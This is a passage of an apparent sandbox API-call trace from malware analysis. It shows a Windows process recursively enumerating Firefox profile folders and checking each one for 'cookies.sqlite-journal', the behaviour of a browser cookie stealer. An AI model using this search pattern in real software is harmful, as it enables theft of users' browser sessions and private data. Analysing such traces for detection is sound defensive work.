pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes", pszFile="events" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events" [0251.326] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5f [0251.326] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events", lpDst=0x79c8020, nSize=0x5f | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events") returned 0x5f [0251.326] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events") returned 94 [0251.326] lstrlenW (lpString="cookies.sqlite-journal") returned 22 [0251.326] PathCombineW (in: pszDest=0x79c5700, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events", pszFile="cookies.sqlite-journal" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\cookies.sqlite-journal") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\cookies.sqlite-journal" [0251.326] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\cookies.sqlite-journal", lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 0xffffffffffffffff [0251.326] PathCombineW (in: pszDest=0x79c5700, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\*" [0251.326] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\*", lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 0x4406a40 [0251.327] FindNextFileW (in: hFindFile=0x4406a40, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 1 [0251.327] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.327] FindNextFileW (in: hFindFile=0x4406a40, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 0 [0251.327] FindClose (in: hFindFile=0x4406a40 | out: hFindFile=0x4406a40) returned 1 [0251.327] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 1 [0251.327] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.327] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 0 [0251.327] FindClose (in: hFindFile=0x44067a0 | out: hFindFile=0x44067a0) returned 1 [0251.327] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.327] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.327] lstrlenW (lpString="datareporting") returned 13 [0251.327] PathCombineW (in: pszDest=0x79b1400, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", pszFile="datareporting" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting" [0251.327] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5e [0251.327] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting", lpDst=0x79c7f50, nSize=0x5e | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting") returned 0x5e [0251.327] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting") returned 93 [0251.327] lstrlenW (lpString="cookies.sqlite-journal") returned 22 [0251.328] PathCombineW (in: pszDest=0x7aaf190, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting", pszFile="cookies.sqlite-journal" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\cookies.sqlite-journal") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\cookies.sqlite-journal" [0251.328] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\cookies.sqlite-journal", lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 0xffffffffffffffff [0251.328] PathCombineW (in: pszDest=0x7aaf190, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\*" [0251.328] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\*", lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 0x44070a0 [0251.328] FindNextFileW (in: hFindFile=0x44070a0, lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 1 [0251.328] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.328] FindNextFileW (in: hFindFile=0x44070a0, lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 1 [0251.328] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.328] lstrlenW (lpString="archived") returned 8 [0251.328] PathCombineW (in: pszDest=0x7aaf190, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting", pszFile="archived" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived" [0251.328] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x67 [0251.328] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived", lpDst=0x79c5700, nSize=0x67 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived") returned 0x67 [0251.328] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived") returned 102 [0251.328] lstrlenW (lpString="cookies.sqlite-journal") returned 22 [0251.328] PathCombineW (in: pszDest=0x79c57e0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived", pszFile="cookies.sqlite-journal" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\cookies.sqlite-journal") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\cookies.sqlite-journal" [0251.328] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\cookies.sqlite-journal", lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 0xffffffffffffffff [0251.329] PathCombineW (in: pszDest=0x79c57e0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\*" [0251.329] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\*", lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 0x44067a0 [0251.329] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 1 [0251.329] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.329] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 1 [0251.329] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.329] lstrlenW (lpString="2017-05") returned 7 [0251.329] PathCombineW (in: pszDest=0x79c57e0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived", pszFile="2017-05" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05" [0251.329] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x6f [0251.329] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05", lpDst=0x79c5c50, nSize=0x6f | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05") returned 0x6f [0251.329] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05") returned 110 [0251.329] lstrlenW (lpString="cookies.sqlite-journal") returned 22 [0251.329] PathCombineW (in: pszDest=0x79c5d40, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05", pszFile="cookies.sqlite-journal" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\cookies.sqlite-journal") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\cookies.sqlite-journal" [0251.329] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\cookies.sqlite-journal", lpFindFileData=0x79c59f0 | out: lpFindFileData=0x79c59f0) returned 0xffffffffffffffff [0251.331] PathCombineW (in: pszDest=0x79c5d40, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\*" [0251.331] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\*", lpFindFileData=0x79c59f0 | out: lpFindFileData=0x79c59f0) returned 0x4406e00 [0251.332] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x79c59f0 | out: lpFindFileData=0x79c59f0) returned 1 [0251.332] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.332] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x79c59f0 | out: lpFindFileData=0x79c59f0) returned 1 [0251.332] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.332] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x79c59f0 | out: lpFindFileData=0x79c59f0) returned 1 [0251.332] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.332] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x79c59f0 | out: lpFindFileData=0x79c59f0) returned 1 [0251.332] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.332] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x79c59f0 | out: lpFindFileData=0x79c59f0) returned 1 [0251.332] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.332] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x79c59f0 | out: lpFindFileData=0x79c59f0) returned 1 [0251.332] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.332] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x79c59f0 | out: lpFindFileData=0x79c59f0) returned 1 [0251.332] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.332] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x79c59f0 | out: lpFindFileData=0x79c59f0) returned 1 [0251.332] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.332] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x79c59f0 | out: lpFindFileData=0x79c59f0) returned 0 [0251.332] FindClose (in: hFindFile=0x4406e00 | out: hFindFile=0x4406e00) returned 1 [0251.333] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 0 [0251.333] FindClose (in: hFindFile=0x44067a0 | out: hFindFile=0x44067a0) returned 1 [0251.333] FindNextFileW (in: hFindFile=0x44070a0, lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 1 [0251.333] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.333] FindNextFileW (in: hFindFile=0x44070a0, lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 1 [0251.333] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.334] FindNextFileW (in: hFindFile=0x44070a0, lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 0 [0251.334] FindClose (in: hFindFile=0x44070a0 | out: hFindFile=0x44070a0) returned 1 [0251.334] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.334] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.334] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.334] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.334] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.334] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.334] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.334] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.334] lstrlenW (lpString="gmp") returned 3 [0251.334] PathCombineW (in: pszDest=0x79b1400, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", pszFile="gmp" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp" [0251.334] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x54 [0251.334] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp", lpDst=0x7aaf190, nSize=0x54 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp") returned 0x54 [0251.334] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp") returned 83 [0251.334] lstrlenW (lpString="cookies.sqlite-journal") returned 22 [0251.334] PathCombineW (in: pszDest=0x7aaf240, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp", pszFile="cookies.sqlite-journal" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\cookies.sqlite-journal") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\cookies.sqlite-journal" [0251.334] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\cookies.sqlite-journal", lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 0xffffffffffffffff [0251.335] PathCombineW (in: pszDest=0x7aaf240, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\*" [0251.335] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\*", lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 0x4406e00 [0251.335] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 1 [0251.335] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.335] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 1 [0251.335] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.335] lstrlenW (lpString="WINNT_x86-msvc") returned 14 [0251.335] PathCombineW (in: pszDest=0x7aaf240, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp", pszFile="WINNT_x86-msvc" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc" [0251.335] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x63 [0251.335] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc", lpDst=0x79c8020, nSize=0x63 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc") returned 0x63 [0251.335] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc") returned 98 [0251.335] lstrlenW (lpString="cookies.sqlite-journal") returned 22 [0251.335] PathCombineW (in: pszDest=0x79c5700, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc", pszFile="cookies.sqlite-journal" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\cookies.sqlite-journal") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\cookies.sqlite-journal" [0251.335] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\cookies.sqlite-journal", lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 0xffffffffffffffff [0251.335] PathCombineW (in: pszDest=0x79c5700, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\*" [0251.335] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\*", lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 0x44064a0 [0251.335] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 1 [0251.336] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.336] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 0 [0251.336] FindClose (in: hFindFile=0x44064a0 | out: hFindFile=0x44064a0) returned 1 [0251.336] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 0 [0251.336] FindClose (in: hFindFile=0x4406e00 | out: hFindFile=0x4406e00) returned 1 [0251.336] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.336] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.336] lstrlenW (lpString="gmp-gmpopenh264") returned 15 [0251.336] PathCombineW (in: pszDest=0x79b1400, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", pszFile="gmp-gmpopenh264" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264" [0251.336] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x60 [0251.336] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264", lpDst=0x79c7e80, nSize=0x60 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264") returned 0x60 [0251.336] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264") returned 95 [0251.336] lstrlenW (lpString="cookies.sqlite-journal") returned 22 [0251.337] PathCombineW (in: pszDest=0x7aaf190, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264", pszFile="cookies.sqlite-journal" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\cookies.sqlite-journal") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\cookies.sqlite-journal" [0251.337] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\cookies.sqlite-journal", lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 0xffffffffffffffff [0251.337] PathCombineW (in: pszDest=0x7aaf190, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\*") 